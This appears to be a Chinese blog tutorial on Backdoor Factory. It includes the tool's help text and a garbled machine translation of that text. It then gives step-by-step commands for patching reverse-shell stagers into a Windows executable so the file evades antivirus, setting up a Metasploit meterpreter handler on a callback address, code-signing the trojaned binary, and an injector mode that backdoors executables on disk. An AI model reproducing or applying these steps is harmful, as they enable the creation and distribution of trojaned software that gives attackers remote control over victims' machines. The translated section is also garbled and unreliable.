后门免杀工具-Backdoor-factory

水一水最近玩的工具 弄dll注入的时候用到的

介绍这款老工具 免杀效果一般。。但是简单实用

 目录:

　　　　0x01 backdoor-factory简介

　　　　0x02 特点功能

　　　　0x03 具体参数使用

　　　　PS：后门添加私钥证书

https://tools.kali.org/exploitation-tools/backdoor-factory

https://github.com/secretsquirrel/the-backdoor-factory

0x01 backdoor-factory简介

后门工厂(BDF)

BDF的目标是用用户所需的shell代码对可执行二进制文件进行补丁，并继续正常执行预补丁状态。

在渗透测试中，后门程序帮助渗透测试人员在目标机器上执行各种预期的操作。例如，它可以建立从目标主机到攻击机的网络连接，方便渗透测试人员控制目标主机。Kali Linux提供一个后门构建工具Backdoor Factory。该工具支持Windows PE和Linux ELF两种运行机制的可执行文件。

利用该工具，用户可以在不破坏原有可执行文件的功能的前提下，在文件的代码裂隙中插入恶意代码Shellcode。当可执行文件被执行后，就可以触发恶意代码。Backdoor Factory不仅提供常用的脚本，还允许嵌入其他工具生成的Shellcode，如Metasploit。

root@kali:~# backdoor-factory
__________                __       .___
\______   \_____    ____ |  | __ __| _/____   ___________
 |    |  _/\__  \ _/ ___\|  |/ // __ |/  _ \ /  _ \_  __ \
 |    |   \ / __ \\  \___|    </ /_/ (  <_> |  <_> )  | \/
 |______  /(____  /\___  >__|_ \____ |\____/ \____/|__|
        \/      \/     \/     \/    \/
___________              __
\_   _____/____    _____/  |_  ___________ ___.__.
 |    __) \__  \ _/ ___\   __\/  _ \_  __ <   |  |
 |     \   / __ \\  \___|  | (  <_> )  | \/\___  |
 \___  /  (____  /\___  >__|  \____/|__|   / ____|
     \/        \/     \/                   \/             

         Author:    Joshua Pitts
         Email:     the.midnite.runr[-at ]gmail<d o-t>com
         Twitter:   @midnite_runr
         IRC:       freenode.net #BDFactory

         Version:   3.4.

Usage: backdoor-factory [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use. Use 'show' to see
                        payloads.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections.
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechanism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -M, --cave-miner      Future use, to help determine smallest shellcode
                        possible in a PE file
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x86, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE
                        certificate table effectively removing the certificate
                        from the binary for all intents and purposes.
  -R, --runas_admin     EXPERIMENTAL Checks the PE binaries for
                        'requestedExecutionLevel level="highestAvailable"'. If
                        this string is included in the binary, it must run as
                        system/admin. If not in Support Check mode it will
                        attmept to patch highestAvailable into the manifest if
                        requestedExecutionLevel entry exists.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs.
                        Patches by default.
  -F FAT_PRIORITY, --fat_priority=FAT_PRIORITY
                        For MACH-O format. If fat file, focus on which arch to
                        patch. Default is x64. To force x86 use -F x86, to
                        force both archs use -F ALL.
  -B BEACON, --beacon=BEACON
                        For payloads that have the ability to beacon out, set
                        the time in secs
  -m PATCH_METHOD, --patch-method=PATCH_METHOD
                        Patching methods for PE files, 'manual','automatic',
                        replace and onionduke
  -b SUPPLIED_BINARY, --user_malware=SUPPLIED_BINARY
                        For onionduke. Provide your desired binary.
  -X, --xp_mode         Default: DO NOT support for XP legacy machines, use -X
                        to support XP. By default the binary will crash on XP
                        machines (e.g. sandboxes)
  -A, --idt_in_cave     EXPERIMENTAL By default a new Import Directory Table
                        is created in a new section, by calling this flag it
                        will be put in a code cave.  This can cause bianry
                        failure is some cases. Test on target binaries first.
  -C, --code_sign       For those with codesigning certs wishing to sign PE
                        binaries only. Name your signing key and private key
                        signingcert.cer and signingPrivateKey.pem repectively
                        in the certs directory it's up to you to obtain
                        signing certs.
  -p, --preprocess      To execute preprocessing scripts in the preprocess
                        directory

-h，——help显示此帮助消息并退出

-f文件，——FILE =FILE文件到后门

- s壳,壳=壳

可用的有效载荷。用show去看

有效载荷。

- h主机,hostip =主机

用于反向连接的C2的IP。

-P端口，——PORT =端口用于连接回shell的端口

或者监听绑定的外壳

如果您想使用code cave，请选择此选项

跳转到进一步隐藏二进制代码中的shell代码。

————add_new_section

命令向exe添加一个新的部分

(更好的成功)但更少的av回避

- u SUPPLIED_SHELLCODE, user_shellcode = SUPPLIED_SHELLCODE

用户提供的shell代码，确保它匹配

您的目标体系结构。

洞穴标志将找到可以使用的代码洞穴

用来存放shellcode。这将打印到所有

特定大小的代码洞穴。可以使用-l标志

这个设置。

- l SHELL_LEN, shell_length = SHELL_LEN

用于与-c一起使用，以帮助查找不同的代码洞穴

大小

- o输出,输出文件=输出

后门输出文件

= NSECTION - n NSECTION,部分

新节名必须小于7个字符

= DIR - d DIR,目录

这是您想要的文件的位置

后门。您可以创建一个文件回滚目录

通过强制将编解码器附加到

通过使用-a设置执行exe。

-w，——change_access这个标志改变了存储codecave的部分

莱茵集团。有时这是必要的。通过

违约。如果禁用，后门可能会失败。

-i，——injector这个命令将后门工厂变成一个狩猎和

shell代码注入机制的类型。编辑目标

注入器模块中的设置。

- u后缀,后缀=后缀

若要与注入器一起使用，请在原始文件上加上后缀

易于恢复的文件

- d, delete_original

与注入器模块一起使用。这个命令删除

原始文件。不用于生产系统。

作者不对愚蠢的使用负责

- o DISK_OFFSET, DISK_OFFSET = DISK_OFFSET

磁盘偏移量上的起始点，单位为字节。一些作者

要混淆它们在磁盘上的偏移量以避免

逆向工程，如果你找到其中一个文件

找到偏移量后使用此标志。

-S，——support_check，以确定该文件是否在之前得到BDF的支持

秘密文件。单独使用或与他人一起使用

详细的。如果。，则自动执行此检查

后门是未遂。

-M，——洞穴挖掘器的未来用途，以帮助确定最小的shell代码

可能在PE文件中

-q， -no_banner杀死了banner。

-v，——用于调试信息输出的详细信息。

- t IMAGE_TYPE,图像类型= IMAGE_TYPE

所有，仅x86或x64类型二进制文件。默认=所有

-Z，——zero_cert允许覆盖指向PE的指针

证书表有效地删除了证书

从二进制的所有意图和目的。

runas_admin实验检查PE二进制文件

' requestedExecutionLevel水平=“highestAvailable”。如果

这个字符串包含在二进制文件中，它必须以

系统/管理。如果没有在支持检查模式，它会

如果是的话，修改清单中的highestAvailable

requestedExecutionLevel条目存在。

如果不想对dll进行补丁，可以使用此设置。

默认情况下补丁。

- f FAT_PRIORITY, FAT_PRIORITY = FAT_PRIORITY

MACH-O格式。如果胖档，重点放在哪个拱门上

补丁。默认是x64。要强制x86使用-F x86

两个顶点都使用-F ALL。

- b灯塔,灯塔=灯塔

对于具有信标能力的有效载荷，设置

时间以秒为单位

- m PATCH_METHOD, patch-method = PATCH_METHOD

PE文件修补方法，“手动”，“自动”，

- b SUPPLIED_BINARY, user_malware = SUPPLIED_BINARY

onionduke。提供所需的二进制文件。

-X，——xp_mode默认值:不支持XP遗留机器，使用-X

支持XP。默认情况下，二进制文件将在XP上崩溃

机器(如沙箱)

-A，——idt_in_cave实验默认情况下一个新的导入目录表

是在一个新的部分中创建的，通过调用这个标志吗

将被放入一个代码洞穴。这会导致变节

失败是一些例子。首先测试目标二进制文件。

-C，——code_sign为那些与合作设计cert希望签署PE

二进制文件。命名您的签名密钥和私钥

signingcert。cer signingPrivateKey。pem安排

在certs目录中，由您来获取

签字确实的事情。

在预处理过程中执行预处理脚本

目录

0x02 特点功能

原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload。

利用其 patch 方式的编码加密技术，可以轻松的生成win32PE后门程序，从而帮助我们绕过一些防病毒软件的查杀，达到一定得免杀效果

工具的一些特点:

patch

通过替换 exe、dll、注册表等方法修复系统漏洞或问题的方法
bdf：向二进制文件中增加或者删除代码内容
某些受保护的二进制程序无法 patch
存在一定概率问价你会被 patch 坏掉

使用于 windows PE x32/64 和 linux ELF x32/64 （OSX）
支持 msf payload、自定义 payload
将 shellcode 代码 patch 进模板文件，躲避 AV 检查

python 语言编写

msf 使用的 patch 方法

覆盖程序入口

msfvenom -p windows/shell/reverse_tcp
创建新的线程执行 shellcode 并跳回原程序入口

msfvenom -p windows/shell/reverse_tcp –k
增加代码片段跳转执行后跳回源程序入口

CTP 方法

增加新的代码段 session，与 msfvenom的-k 方法类似
使用现有的代码裂缝/洞（code cave）存放 shellcode

代码洞

二进制中超过两个字节的连续 x00 区域（代码片段间区域）
根据统计判断代码洞是编译在进行编译是造成的，不同的编译器造成的代码洞的大小不同

单个代码洞代销不足以存放完整的 shellcode

多代码洞跳转（非顺序执行）

初期免杀率可达100%
结合 msf 的 stager 方法

0x03 具体参数使用

提一下 不要kali自带的  是个坑。

随着拿个exe  小葵转换工具.exe

安装github都有。

查看是否支持后门patch

-f：指定测试程序
-S：检查该程序是否支持 patch

backdoor-factory -f kui.exe -S

指定的 shellcode patch

backdoor-factory -f kui.exe -c -l 

-c：code cave(代码裂缝)
-l：代码裂缝大小

查看支持哪些 payload 的注入：

backdoor-factory -f kui.exe -s show

注入payload

backdoor-factory -f kui.exe -s iat_reverse_tcp_stager_threaded -H 192.168.5.4 -P 

-s：选择使用 payload 类型
-H：选择回连服务器地址
-P：回连服务器端口

选择了code cave的序号即可完成

msf监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.5.3
set lport
exploit

 

对比原文件与生成文件MD5值

md5sum ./kui.exe /root/kui.exe

常用参数

-c：code cave(代码裂缝)

-l：代码裂缝大小

-s：选择使用 payload 类型

-H：选择回连服务器地址

-P：回连服务器端口

-J：使用多代码裂缝注入

PS:看手册是可以添加自己的私钥证书在我们的马儿里面~~~

看了网上好像没人写这个

使用:将私钥放在一个文件里:

echo -n yourpassword > certs/passFile.txt

证书格式：

signingCert.cer => certs/signingCert.cer
signingPrivateKey.pem => certs/signingPrivateKey.pem

证书目录：

certs
├── passFile.txt
├── signingPrivateKey.pem
└── signingCert.cer

这时候我们需要使用C参数 生成win32pe代码裂缝插入私钥部分。

例子：

./backdoor.py -f kui.exe -s iat_reverse_tcp_inline -H 192.168.5.4 -P  -m automatic -C

[*] Code Signing Succeeded
###Hunt and backdoor: Injector | Windows Only The injector module will look for target executables to backdoor on disk. It will check to see if you have identified the target as a service, check to see if the process is running, kill the process and/or service, inject the executable with the shellcode, save the original file to either file.exe.old or another suffix of choice, and attempt to restart the process or service.

这里还可以选择在python字典的注入模块 这个没试 有空研究下

./backdoor.py -i -H 192.168.0.100 -P  -s reverse_shell_tcp -a -u .moocowwow